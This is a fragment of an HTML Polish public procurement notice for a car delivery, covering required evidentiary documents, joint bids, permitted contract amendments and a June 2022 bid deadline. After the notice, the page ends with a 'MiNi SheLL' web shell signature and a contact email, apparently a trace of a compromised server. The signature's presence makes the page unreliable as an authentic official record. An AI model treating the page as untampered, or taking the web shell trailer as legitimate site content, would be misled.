wykluczeniu<br/><br/><br/><br/><br/><br/><br/><br/> 3. Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w <br/> wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków <br/> dowodowych1, jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub dokumentach <br/> zamówienia, aktualnych na dzień złożenia podmiotowych środków dowodowych.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/> 1) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2020 r. poz. 1076 z późn. zm.), z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 4 do SWZ;<br/> 5. Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać <br/> za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 p.z.p dane umożliwiające dostęp do tych środków;<br/> 6. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które zamawiający posiada, jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.<br/> 7. W zakresie nieuregulowanym ustawą P.z.p. lub niniejszą SWZ do oświadczeń <br/> i dokumentów składanych przez Wykonawcę w postępowaniu zastosowanie mają w <br/> szczególności przepisy rozporządzenia Ministra Rozwoju Pracy i Technologii z dnia 23 <br/> grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów <br/> lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. poz. 2415) oraz <br/> rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu <br/> sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów <br/> elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie <br/> zamówienia publicznego lub konkursie (Dz. U. poz. 2452).</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/> 2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/> 3. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wszelkie zmiany umowy wymagają zastosowania formy pisemnego aneksu.<br/>2.	Poza zmianami dopuszczonymi w art. 455 Ustawy Pzp. dopuszcza się możliwość zmian postanowień zawartej umowy, w następujących przypadkach:<br/>1)	Zamawiający przewiduje możliwość zmiany części składowych samochodu, bez zmiany poziomu maksymalnego wynagrodzenia, o którym mowa w § 2 Umowy, pod warunkiem, że dostarczenie samochodu z częściami składowymi wynikającymi z oferty Wykonawcy nie jest możliwe w terminie lub zakresie wynikającym z Umowy, z przyczyn o obiektywnym charakterze, niezależnych od Wykonawcy, których Wykonawca nie mógł przewidzieć w chwili składania oferty oraz pod warunkiem, że:<br/>a)	Zmiana obejmować będzie dostawę samochodu zawierającego części składowe o parametrach funkcjonalnych identycznych lub lepszych od właściwości części składowych samochodu objętego ofertą Wykonawcy;<br/>2)	Zamawiający przewiduje możliwość zmiany terminu realizacji dostawy w ramach Umowy, o którym mowa w § 3 ust.1 Umowy bez zmiany poziomu maksymalnego wynagrodzenia, o którym mowa w § 2 Umowy w przypadku zaistnienia okoliczności niezależnych od Wykonawcy w postaci:<br/>a)	Działania siły wyższej rozumianej, jako okoliczności, które pomimo zachowania należytej staranności i podjęcia wszelkich działań w normalnym zakresie, nie można było przewidzieć oraz im zapobiec, bądź się im przeciwstawić w sposób skuteczny, pod warunkiem, iż:<br/>i. działanie siły wyższej oraz czas jej trwania zostanie przez Wykonawcę uprawdopodobnione za pomocą odpowiednich oświadczeń i dokumentów,<br/>ii. zmiana terminu polegać będzie na jego wydłużeniu lub skróceniu o okres działania siły wyższej uniemożliwiającej prawidłowe wykonanie Umowy.<br/>iii. Wykonawca zawiadomi Zamawiającego o wystąpieniu okoliczności siły wyższej niezwłocznie, w takim przypadku Wykonawca nie ponosi odpowiedzialności za niewykonanie Lub nienależyte wykonanie zobowiązań wynikających z Umowy powstałe na skutek siły wyższej. Zadziałanie siły wyższej w rozumieniu niniejszego punktu uznaje się także okoliczności (skutki) powodowane wystąpieniem COVID-19, których to okoliczności (skutków) pomimo zachowania należytej staranności podjęcia wszelkich działań w normalnym zakresie, nie można było przewidzieć oraz im zapobiec, bądź się przeciwstawić w sposób skuteczny.<br/>3)	Zamawiający przewiduje możliwość zmiany podwykonawcy oraz części zamówienia wykonywanej przez podwykonawcę, wskazanych w § 10 ust 1 Umowy, każdorazowo w przypadku zmiany podwykonawcy lub zakresu zamówienia wykonywanego przez podwykonawcę na podstawie informacji przekazanej przez Wykonawcę zgodnie z § 10 ust. 5 Umowy, a zmiana w tym zakresie nie spowoduje zmiany poziomu maksymalnego wynagrodzenia, o którym mowa w § 2 Umowy.<br/>4)	Zamawiający przewiduje możliwość wprowadzenia nowego podwykonawcy w okresie obowiązywania Umowy, przy spełnieniu wymogów określonych w § 10 ust. 6 Umowy, pod warunkiem, że zmiana w tym zakresie nie spowoduje zmiany poziomu maksymalnego wynagrodzenia, o którym mowa w § 2Umowy oraz zmiany terminu realizacji dostawy oraz zmiany zakresu przedmiotowego dostawy oraz zmiany w sposobie realizacji Umowy;<br/>5)	Zamawiający przewiduje możliwość zmiany maksymalnego wynagrodzenia, o którym mowa w § 2 Umowy w przypadku wprowadzenia zmian przepisów prawa dotyczących wysokości stawki podatku od towarów i usług lub innych podatków i opłat mających bezpośrednie zastosowanie do ceny zaoferowanej przez Wykonawcę, pod warunkiem, iż zmiana ta nie powoduje zmiany w sposobie realizacji Umowy, a zakres zmian wynikać będzie a wprowadzonych zmian przepisów prawa.<br/>6)	Dopuszcza się możliwość zmiany umowy w zakresie zmiany terminu wykonania zamówienia z zakresie niezbędnym do wykonania dostaw, których mowa w art. 455 ust. 1 pkt. 3 i 4 oraz ust. 2 ustawy Pzp.<br/>3.	Każda ze Stron umowy zobowiązana jest do pisemnego poinformowania drugiej ze Stron o konieczności zmiany umowy ze wskazaniem uzasadnienia tej zmiany. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-21 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1.	Ofertę należy złożyć poprzez miniPortal ; https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-21 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Nie dotyczy

Creat By MiNi SheLL
Email: jattceo@gmail.com